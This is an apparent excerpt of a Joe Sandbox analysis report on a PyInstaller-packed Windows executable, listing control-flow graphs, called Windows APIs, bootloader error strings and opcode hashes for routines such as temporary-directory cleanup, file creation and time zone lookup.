                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 62 7ff7e12c1000-7ff7e12c3806 call 7ff7e12cfe18 call 7ff7e12cfe20 call 7ff7e12cc850 call 7ff7e12d53f0 call 7ff7e12d5484 call 7ff7e12c36b0 76 7ff7e12c3814-7ff7e12c3836 call 7ff7e12c1950 62->76 77 7ff7e12c3808-7ff7e12c380f 62->77 83 7ff7e12c383c-7ff7e12c3856 call 7ff7e12c1c80 76->83 84 7ff7e12c391b-7ff7e12c3931 call 7ff7e12c45c0 76->84 78 7ff7e12c3c97-7ff7e12c3cb2 call 7ff7e12cc550 77->78 88 7ff7e12c385b-7ff7e12c389b call 7ff7e12c8830 83->88 89 7ff7e12c3933-7ff7e12c3960 call 7ff7e12c7f90 84->89 90 7ff7e12c396a-7ff7e12c397f call 7ff7e12c2710 84->90 97 7ff7e12c38c1-7ff7e12c38cc call 7ff7e12d4f30 88->97 98 7ff7e12c389d-7ff7e12c38a3 88->98 102 7ff7e12c3962-7ff7e12c3965 call 7ff7e12d004c 89->102 103 7ff7e12c3984-7ff7e12c39a6 call 7ff7e12c1c80 89->103 104 7ff7e12c3c8f 90->104 110 7ff7e12c38d2-7ff7e12c38e1 call 7ff7e12c8830 97->110 111 7ff7e12c39fc-7ff7e12c3a2a call 7ff7e12c8940 call 7ff7e12c89a0 * 3 97->111 99 7ff7e12c38af-7ff7e12c38bd call 7ff7e12c89a0 98->99 100 7ff7e12c38a5-7ff7e12c38ad 98->100 99->97 100->99 102->90 115 7ff7e12c39b0-7ff7e12c39b9 103->115 104->78 120 7ff7e12c39f4-7ff7e12c39f7 call 7ff7e12d4f30 110->120 121 7ff7e12c38e7-7ff7e12c38ed 110->121 138 7ff7e12c3a2f-7ff7e12c3a3e call 7ff7e12c8830 111->138 115->115 116 7ff7e12c39bb-7ff7e12c39d8 call 7ff7e12c1950 115->116 116->88 127 7ff7e12c39de-7ff7e12c39ef call 7ff7e12c2710 116->127 120->111 125 7ff7e12c38f0-7ff7e12c38fc 121->125 128 7ff7e12c3905-7ff7e12c3908 125->128 129 7ff7e12c38fe-7ff7e12c3903 125->129 127->104 128->120 132 7ff7e12c390e-7ff7e12c3916 call 7ff7e12d4f30 128->132 129->125 129->128 132->138 141 7ff7e12c3b45-7ff7e12c3b53 138->141 142 7ff7e12c3a44-7ff7e12c3a47 138->142 144 7ff7e12c3b59-7ff7e12c3b5d 141->144 145 7ff7e12c3a67 141->145 142->141 143 7ff7e12c3a4d-7ff7e12c3a50 142->143 146 7ff7e12c3a56-7ff7e12c3a5a 143->146 147 7ff7e12c3b14-7ff7e12c3b17 143->147 148 7ff7e12c3a6b-7ff7e12c3a90 call 7ff7e12d4f30 144->148 145->148 146->147 149 7ff7e12c3a60 146->149 150 7ff7e12c3b2f-7ff7e12c3b40 call 7ff7e12c2710 147->150 151 7ff7e12c3b19-7ff7e12c3b1d 147->151 157 7ff7e12c3a92-7ff7e12c3aa6 call 7ff7e12c8940 148->157 158 7ff7e12c3aab-7ff7e12c3ac0 148->158 149->145 159 7ff7e12c3c7f-7ff7e12c3c87 150->159 151->150 153 7ff7e12c3b1f-7ff7e12c3b2a 151->153 153->148 157->158 161 7ff7e12c3ac6-7ff7e12c3aca 158->161 162 7ff7e12c3be8-7ff7e12c3bfa call 7ff7e12c8830 158->162 159->104 164 7ff7e12c3ad0-7ff7e12c3ae8 call 7ff7e12d5250 161->164 165 7ff7e12c3bcd-7ff7e12c3be2 call 7ff7e12c1940 161->165 169 7ff7e12c3c2e 162->169 170 7ff7e12c3bfc-7ff7e12c3c02 162->170 175 7ff7e12c3b62-7ff7e12c3b7a call 7ff7e12d5250 164->175 176 7ff7e12c3aea-7ff7e12c3b02 call 7ff7e12d5250 164->176 165->161 165->162 177 7ff7e12c3c31-7ff7e12c3c40 call 7ff7e12d4f30 169->177 173 7ff7e12c3c04-7ff7e12c3c1c 170->173 174 7ff7e12c3c1e-7ff7e12c3c2c 170->174 173->177 174->177 184 7ff7e12c3b87-7ff7e12c3b9f call 7ff7e12d5250 175->184 185 7ff7e12c3b7c-7ff7e12c3b80 175->185 176->165 186 7ff7e12c3b08-7ff7e12c3b0f 176->186 187 7ff7e12c3d41-7ff7e12c3d63 call 7ff7e12c44e0 177->187 188 7ff7e12c3c46-7ff7e12c3c4a 177->188 197 7ff7e12c3ba1-7ff7e12c3ba5 184->197 198 7ff7e12c3bac-7ff7e12c3bc4 call 7ff7e12d5250 184->198 185->184 186->165 201 7ff7e12c3d71-7ff7e12c3d82 call 7ff7e12c1c80 187->201 202 7ff7e12c3d65-7ff7e12c3d6f call 7ff7e12c4630 187->202 190 7ff7e12c3c50-7ff7e12c3c5f call 7ff7e12c90e0 188->190 191 7ff7e12c3cd4-7ff7e12c3ce6 call 7ff7e12c8830 188->191 205 7ff7e12c3c61 190->205 206 7ff7e12c3cb3-7ff7e12c3cb6 call 7ff7e12c8660 190->206 207 7ff7e12c3d35-7ff7e12c3d3c 191->207 208 7ff7e12c3ce8-7ff7e12c3ceb 191->208 197->198 198->165 219 7ff7e12c3bc6 198->219 210 7ff7e12c3d87-7ff7e12c3d96 201->210 202->210 213 7ff7e12c3c68 call 7ff7e12c2710 205->213 218 7ff7e12c3cbb-7ff7e12c3cbd 206->218 207->213 208->207 214 7ff7e12c3ced-7ff7e12c3d10 call 7ff7e12c1c80 208->214 216 7ff7e12c3dc4-7ff7e12c3dda call 7ff7e12c9390 210->216 217 7ff7e12c3d98-7ff7e12c3d9f 210->217 226 7ff7e12c3c6d-7ff7e12c3c77 213->226 228 7ff7e12c3d12-7ff7e12c3d26 call 7ff7e12c2710 call 7ff7e12d4f30 214->228 229 7ff7e12c3d2b-7ff7e12c3d33 call 7ff7e12d4f30 214->229 234 7ff7e12c3de8-7ff7e12c3e04 SetDllDirectoryW 216->234 235 7ff7e12c3ddc 216->235 217->216 222 7ff7e12c3da1-7ff7e12c3da5 217->222 224 7ff7e12c3cbf-7ff7e12c3cc6 218->224 225 7ff7e12c3cc8-7ff7e12c3ccf 218->225 219->165 222->216 230 7ff7e12c3da7-7ff7e12c3dbe SetDllDirectoryW LoadLibraryExW 222->230 224->213 225->210 226->159 228->226 229->210 230->216 238 7ff7e12c3f01-7ff7e12c3f08 234->238 239 7ff7e12c3e0a-7ff7e12c3e19 call 7ff7e12c8830 234->239 235->234 241 7ff7e12c4008-7ff7e12c4010 238->241 242 7ff7e12c3f0e-7ff7e12c3f15 238->242 251 7ff7e12c3e32-7ff7e12c3e3c call 7ff7e12d4f30 239->251 252 7ff7e12c3e1b-7ff7e12c3e21 239->252 246 7ff7e12c4012-7ff7e12c402f PostMessageW GetMessageW 241->246 247 7ff7e12c4035-7ff7e12c4067 call 7ff7e12c36a0 call 7ff7e12c3360 call 7ff7e12c3670 call 7ff7e12c6fc0 call 7ff7e12c6d70 241->247 242->241 245 7ff7e12c3f1b-7ff7e12c3f25 call 7ff7e12c33c0 242->245 245->226 259 7ff7e12c3f2b-7ff7e12c3f3f call 7ff7e12c90c0 245->259 246->247 261 7ff7e12c3ef2-7ff7e12c3efc call 7ff7e12c8940 251->261 262 7ff7e12c3e42-7ff7e12c3e48 251->262 256 7ff7e12c3e23-7ff7e12c3e2b 252->256 257 7ff7e12c3e2d-7ff7e12c3e2f 252->257 256->257 257->251 272 7ff7e12c3f41-7ff7e12c3f5e PostMessageW GetMessageW 259->272 273 7ff7e12c3f64-7ff7e12c3fa0 call 7ff7e12c8940 call 7ff7e12c89e0 call 7ff7e12c6fc0 call 7ff7e12c6d70 call 7ff7e12c88e0 259->273 261->238 262->261 267 7ff7e12c3e4e-7ff7e12c3e54 262->267 270 7ff7e12c3e5f-7ff7e12c3e61 267->270 271 7ff7e12c3e56-7ff7e12c3e58 267->271 270->238 276 7ff7e12c3e67-7ff7e12c3e83 call 7ff7e12c6dc0 call 7ff7e12c7340 270->276 275 7ff7e12c3e5a 271->275 271->276 272->273 307 7ff7e12c3fa5-7ff7e12c3fa7 273->307 275->238 290 7ff7e12c3e85-7ff7e12c3e8c 276->290 291 7ff7e12c3e8e-7ff7e12c3e95 276->291 295 7ff7e12c3edb-7ff7e12c3ef0 call 7ff7e12c2a50 call 7ff7e12c6fc0 call 7ff7e12c6d70 290->295 292 7ff7e12c3eaf-7ff7e12c3eb9 call 7ff7e12c71b0 291->292 293 7ff7e12c3e97-7ff7e12c3ea4 call 7ff7e12c6e00 291->293 305 7ff7e12c3ec4-7ff7e12c3ed2 call 7ff7e12c74f0 292->305 306 7ff7e12c3ebb-7ff7e12c3ec2 292->306 293->292 304 7ff7e12c3ea6-7ff7e12c3ead 293->304 295->238 304->295 305->238 319 7ff7e12c3ed4 305->319 306->295 311 7ff7e12c3ff5-7ff7e12c4003 call 7ff7e12c1900 307->311 312 7ff7e12c3fa9-7ff7e12c3fbf call 7ff7e12c8ed0 call 7ff7e12c88e0 307->312 311->226 312->311 323 7ff7e12c3fc1-7ff7e12c3fd6 312->323 319->295 324 7ff7e12c3ff0 call 7ff7e12c2a50 323->324 325 7ff7e12c3fd8-7ff7e12c3feb call 7ff7e12c2710 call 7ff7e12c1900 323->325 324->311 325->226
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                                                                      • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                                                                                                                                                      • API String ID: 2776309574-4232158417
                                                                                                                                                                                                                                                                                      • Opcode ID: 824ed701c3c560fed3adc96ede838a2023945a6ada8c955277e175104ca074ca
                                                                                                                                                                                                                                                                                      • Instruction ID: 4d2c99a9177edecaaa5b682b82325fcd493c8c40b473d9cd541dac168e12def1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 824ed701c3c560fed3adc96ede838a2023945a6ada8c955277e175104ca074ca
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D325C21B0868291FB19F725DC563F9A669AF44780FC48433DB5D822D6EFBCE558C322

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 479 7ff7e12e5c00-7ff7e12e5c3b call 7ff7e12e5588 call 7ff7e12e5590 call 7ff7e12e55f8 486 7ff7e12e5e65-7ff7e12e5eb1 call 7ff7e12da900 call 7ff7e12e5588 call 7ff7e12e5590 call 7ff7e12e55f8 479->486 487 7ff7e12e5c41-7ff7e12e5c4c call 7ff7e12e5598 479->487 512 7ff7e12e5fef-7ff7e12e605d call 7ff7e12da900 call 7ff7e12e1578 486->512 513 7ff7e12e5eb7-7ff7e12e5ec2 call 7ff7e12e5598 486->513 487->486 493 7ff7e12e5c52-7ff7e12e5c5c 487->493 495 7ff7e12e5c7e-7ff7e12e5c82 493->495 496 7ff7e12e5c5e-7ff7e12e5c61 493->496 497 7ff7e12e5c85-7ff7e12e5c8d 495->497 499 7ff7e12e5c64-7ff7e12e5c6f 496->499 497->497 502 7ff7e12e5c8f-7ff7e12e5ca2 call 7ff7e12dd5fc 497->502 500 7ff7e12e5c71-7ff7e12e5c78 499->500 501 7ff7e12e5c7a-7ff7e12e5c7c 499->501 500->499 500->501 501->495 504 7ff7e12e5cab-7ff7e12e5cb9 501->504 510 7ff7e12e5ca4-7ff7e12e5ca6 call 7ff7e12da948 502->510 511 7ff7e12e5cba-7ff7e12e5cc6 call 7ff7e12da948 502->511 510->504 520 7ff7e12e5ccd-7ff7e12e5cd5 511->520 533 7ff7e12e605f-7ff7e12e6066 512->533 534 7ff7e12e606b-7ff7e12e606e 512->534 513->512 522 7ff7e12e5ec8-7ff7e12e5ed3 call 7ff7e12e55c8 513->522 520->520 523 7ff7e12e5cd7-7ff7e12e5ce8 call 7ff7e12e0474 520->523 522->512 531 7ff7e12e5ed9-7ff7e12e5efc call 7ff7e12da948 GetTimeZoneInformation 522->531 523->486 532 7ff7e12e5cee-7ff7e12e5d44 call 7ff7e12ea4d0 * 4 call 7ff7e12e5b1c 523->532 548 7ff7e12e5fc4-7ff7e12e5fee call 7ff7e12e5580 call 7ff7e12e5570 call 7ff7e12e5578 531->548 549 7ff7e12e5f02-7ff7e12e5f23 531->549 591 7ff7e12e5d46-7ff7e12e5d4a 532->591 539 7ff7e12e60fb-7ff7e12e60fe 533->539 535 7ff7e12e60a5-7ff7e12e60b8 call 7ff7e12dd5fc 534->535 536 7ff7e12e6070 534->536 556 7ff7e12e60c3-7ff7e12e60de call 7ff7e12e1578 535->556 557 7ff7e12e60ba 535->557 541 7ff7e12e6073 536->541 540 7ff7e12e6104-7ff7e12e610c call 7ff7e12e5c00 539->540 539->541 546 7ff7e12e6078-7ff7e12e60a4 call 7ff7e12da948 call 7ff7e12cc550 540->546 541->546 547 7ff7e12e6073 call 7ff7e12e5e7c 541->547 547->546 554 7ff7e12e5f25-7ff7e12e5f2b 549->554 555 7ff7e12e5f2e-7ff7e12e5f35 549->555 554->555 562 7ff7e12e5f37-7ff7e12e5f3f 555->562 563 7ff7e12e5f49 555->563 579 7ff7e12e60e5-7ff7e12e60f7 call 7ff7e12da948 556->579 580 7ff7e12e60e0-7ff7e12e60e3 556->580 564 7ff7e12e60bc-7ff7e12e60c1 call 7ff7e12da948 557->564 562->563 572 7ff7e12e5f41-7ff7e12e5f47 562->572 569 7ff7e12e5f4b-7ff7e12e5fbf call 7ff7e12ea4d0 * 4 call 7ff7e12e2b5c call 7ff7e12e6114 * 2 563->569 564->536 569->548 572->569 579->539 580->564 593 7ff7e12e5d50-7ff7e12e5d54 591->593 594 7ff7e12e5d4c 591->594 593->591 596 7ff7e12e5d56-7ff7e12e5d7b call 7ff7e12d6b58 593->596 594->593 602 7ff7e12e5d7e-7ff7e12e5d82 596->602 604 7ff7e12e5d84-7ff7e12e5d8f 602->604 605 7ff7e12e5d91-7ff7e12e5d95 602->605 604->605 607 7ff7e12e5d97-7ff7e12e5d9b 604->607 605->602 610 7ff7e12e5e1c-7ff7e12e5e20 607->610 611 7ff7e12e5d9d-7ff7e12e5dc5 call 7ff7e12d6b58 607->611 613 7ff7e12e5e22-7ff7e12e5e24 610->613 614 7ff7e12e5e27-7ff7e12e5e34 610->614 619 7ff7e12e5de3-7ff7e12e5de7 611->619 620 7ff7e12e5dc7 611->620 613->614 616 7ff7e12e5e36-7ff7e12e5e4c call 7ff7e12e5b1c 614->616 617 7ff7e12e5e4f-7ff7e12e5e5e call 7ff7e12e5580 call 7ff7e12e5570 614->617 616->617 617->486 619->610 625 7ff7e12e5de9-7ff7e12e5e07 call 7ff7e12d6b58 619->625 623 7ff7e12e5dca-7ff7e12e5dd1 620->623 623->619 626 7ff7e12e5dd3-7ff7e12e5de1 623->626 631 7ff7e12e5e13-7ff7e12e5e1a 625->631 626->619 626->623 631->610 632 7ff7e12e5e09-7ff7e12e5e0d 631->632 632->610 633 7ff7e12e5e0f 632->633 633->631
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7E12E5C45
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12E5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E55AC
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12DA948: RtlFreeHeap.NTDLL(?,?,?,00007FF7E12E2D22,?,?,?,00007FF7E12E2D5F,?,?,00000000,00007FF7E12E3225,?,?,?,00007FF7E12E3157), ref: 00007FF7E12DA95E
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12DA948: GetLastError.KERNEL32(?,?,?,00007FF7E12E2D22,?,?,?,00007FF7E12E2D5F,?,?,00000000,00007FF7E12E3225,?,?,?,00007FF7E12E3157), ref: 00007FF7E12DA968
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12DA900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7E12DA8DF,?,?,?,?,?,00007FF7E12DA7CA), ref: 00007FF7E12DA909
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12DA900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7E12DA8DF,?,?,?,?,?,00007FF7E12DA7CA), ref: 00007FF7E12DA92E
                                                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7E12E5C34
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12E55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E560C
                                                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7E12E5EAA
                                                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7E12E5EBB
                                                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7E12E5ECC
                                                                                                                                                                                                                                                                                      • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7E12E610C), ref: 00007FF7E12E5EF3
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                                                      • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                                                      • API String ID: 4070488512-239921721
                                                                                                                                                                                                                                                                                      • Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                                                                      • Instruction ID: 0f0351766d532e8329fa7609a255cc26f3cec78aba50a6adecb84e9bc3bcff5f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BFD1C26AB2824246E721BF31DC423B9E399EF54784FC4C137EA0E87695DEBCE4418761

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 693 7ff7e12e6964-7ff7e12e69d7 call 7ff7e12e6698 696 7ff7e12e69f1-7ff7e12e69fb call 7ff7e12d8520 693->696 697 7ff7e12e69d9-7ff7e12e69e2 call 7ff7e12d4ee8 693->697 702 7ff7e12e6a16-7ff7e12e6a7f CreateFileW 696->702 703 7ff7e12e69fd-7ff7e12e6a14 call 7ff7e12d4ee8 call 7ff7e12d4f08 696->703 704 7ff7e12e69e5-7ff7e12e69ec call 7ff7e12d4f08 697->704 706 7ff7e12e6a81-7ff7e12e6a87 702->706 707 7ff7e12e6afc-7ff7e12e6b07 GetFileType 702->707 703->704 720 7ff7e12e6d32-7ff7e12e6d52 704->720 710 7ff7e12e6ac9-7ff7e12e6af7 GetLastError call 7ff7e12d4e7c 706->710 711 7ff7e12e6a89-7ff7e12e6a8d 706->711 713 7ff7e12e6b5a-7ff7e12e6b61 707->713 714 7ff7e12e6b09-7ff7e12e6b44 GetLastError call 7ff7e12d4e7c CloseHandle 707->714 710->704 711->710 718 7ff7e12e6a8f-7ff7e12e6ac7 CreateFileW 711->718 716 7ff7e12e6b63-7ff7e12e6b67 713->716 717 7ff7e12e6b69-7ff7e12e6b6c 713->717 714->704 727 7ff7e12e6b4a-7ff7e12e6b55 call 7ff7e12d4f08 714->727 723 7ff7e12e6b72-7ff7e12e6bc7 call 7ff7e12d8438 716->723 717->723 724 7ff7e12e6b6e 717->724 718->707 718->710 732 7ff7e12e6be6-7ff7e12e6c17 call 7ff7e12e6418 723->732 733 7ff7e12e6bc9-7ff7e12e6bd5 call 7ff7e12e68a0 723->733 724->723 727->704 738 7ff7e12e6c1d-7ff7e12e6c5f 732->738 739 7ff7e12e6c19-7ff7e12e6c1b 732->739 733->732 740 7ff7e12e6bd7 733->740 742 7ff7e12e6c81-7ff7e12e6c8c 738->742 743 7ff7e12e6c61-7ff7e12e6c65 738->743 741 7ff7e12e6bd9-7ff7e12e6be1 call 7ff7e12daac0 739->741 740->741 741->720 745 7ff7e12e6d30 742->745 746 7ff7e12e6c92-7ff7e12e6c96 742->746 743->742 744 7ff7e12e6c67-7ff7e12e6c7c 743->744 744->742 745->720 746->745 749 7ff7e12e6c9c-7ff7e12e6ce1 CloseHandle CreateFileW 746->749 750 7ff7e12e6ce3-7ff7e12e6d11 GetLastError call 7ff7e12d4e7c call 7ff7e12d8660 749->750 751 7ff7e12e6d16-7ff7e12e6d2b 749->751 750->751 751->745
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1617910340-0
                                                                                                                                                                                                                                                                                      • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                                                                      • Instruction ID: fa1b00118abf8c3beb5864411022a9176577bd252dcd7c31b3930ecdedd5bb51
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79C1F333B28A4285EB11DFA5C8823AC7765F749B98F81423ADE2E97794CF79E051C311

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,00007FF7E12C8919,00007FF7E12C3FA5), ref: 00007FF7E12C842B
                                                                                                                                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?,00007FF7E12C8919,00007FF7E12C3FA5), ref: 00007FF7E12C84AE
                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNELBASE(?,00007FF7E12C8919,00007FF7E12C3FA5), ref: 00007FF7E12C84CD
                                                                                                                                                                                                                                                                                      • FindNextFileW.KERNELBASE(?,00007FF7E12C8919,00007FF7E12C3FA5), ref: 00007FF7E12C84DB
                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(?,00007FF7E12C8919,00007FF7E12C3FA5), ref: 00007FF7E12C84EC
                                                                                                                                                                                                                                                                                      • RemoveDirectoryW.KERNELBASE(?,00007FF7E12C8919,00007FF7E12C3FA5), ref: 00007FF7E12C84F5
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                                                                      • String ID: %s\*
                                                                                                                                                                                                                                                                                      • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                                                                      • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                                                                      • Instruction ID: be77b914b5352e0c1d764396ffd378e90c9967b9c534c40af67204c626d5dd18
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59418221B0C94285EB30AB10EC463BAE369FB94754FC18237D69D83694EFBCD585C762

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
